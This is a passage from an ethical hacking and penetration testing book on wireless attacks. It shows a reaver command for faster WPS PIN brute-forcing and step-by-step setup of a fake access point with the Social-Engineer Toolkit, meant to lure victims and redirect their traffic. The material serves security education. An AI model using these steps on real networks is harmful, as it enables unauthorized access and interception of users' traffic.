Ethical Hacking and Penetration Testing Guide
◾ Ethical Hacking and Penetration Testing Guide Reducing the Delay
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Setting Up a Fake Access Point with SET to PWN Users
|
306
◾ Ethical Hacking and Penetration Testing Guide Reducing the Delay We can tweak reaver into reducing the delay between the pins. The default delay is 1 s, but we can reduce it to 0 by specifying a –d parameter. Command : reaver –i mon0 –b ≤bssid≥ –d 0 reaver –i mon0 –b ≤bssid≥ –d 0 Further Reading For further hints, tips, and usage guide, I’d recommend you to take a look at the official wiki of reaver: https://code.google.com/p/reaver-wps/wiki/HintsAndTips http://www.amazon.com/ALFA-Network-AWUS036H-Wireless-802-11g/dp/B000WXSO76 Setting Up a Fake Access Point with SET to PWN Users The next attack we would talk about is setting up a rogue or fake access point. Our goal would be to make the victim connect to it, and since we will have control of the access point, we can redirect traffic as we want. We will use the SET to raise a fake access point. Though there are other tools that can be used here, such as airbase, gerrix, etc., I found SET to be the simplest. Wireless Hacking ◾ 307 Step 1 —From the “Social Engineering Attacks” menu, select the “Wireless Access Point attack Vector.” Step 2 —We can see from the description that we require four utilities to launch this attack vector, namely, Air-Base-NG, AirMon-NG, DNSSpoof, and dhcp3. Except for dhcp3, the other tools come preinstalled with BackTrack 5. Therefore, we would need to install dhcp3 in order to launch this attack vector. Step 3 —We would use “apt-get install dhcp3-server” command to install dhcp3 inside of BackTrack. It’s listed in the image, since I have already installed it. If you face any problems while installing the dhcp3 server, I would recommend you to consult the backtrack-linux. org forum. 308 ◾ Ethical Hacking and Penetration Testing Guide Step 4 —After you have installed the dhcp3 server, from the SET choose the first option to start setting the fake access point. Next, the SET will take you to the /etc/default/dhcp3-server file where you would need to specify the interface on which you would like the dhcp server to serve the dhcp requests. We would now add our wireless interface “wlan0” for serving dhcp requests. Step 5 —Next, it will ask you for the dhcp range to assign to the clients that would connect to our access points. I would prefer choosing 192.168.10.100-254, since it’s used more often. Step 6 —Finally, we would enter our wireless network interface, which would be wlan0; yours might be different, you can do iwconfig to check for your wireless interfaces. Wireless Hacking ◾ 309 Now, we are all set and done and the SET will launch our fake access point with the SSID “linksys”, which is its name by default. It will have no encryption set. As a side note, if we would like to change the name of our wireless access point, we can do it by modifying the value of ACCESS_POINT_SSID parameter located inside the SET config file in the /pentest/exploits/set/config directory. Yüklə 22,44 Mb. Dostları ilə paylaş:
|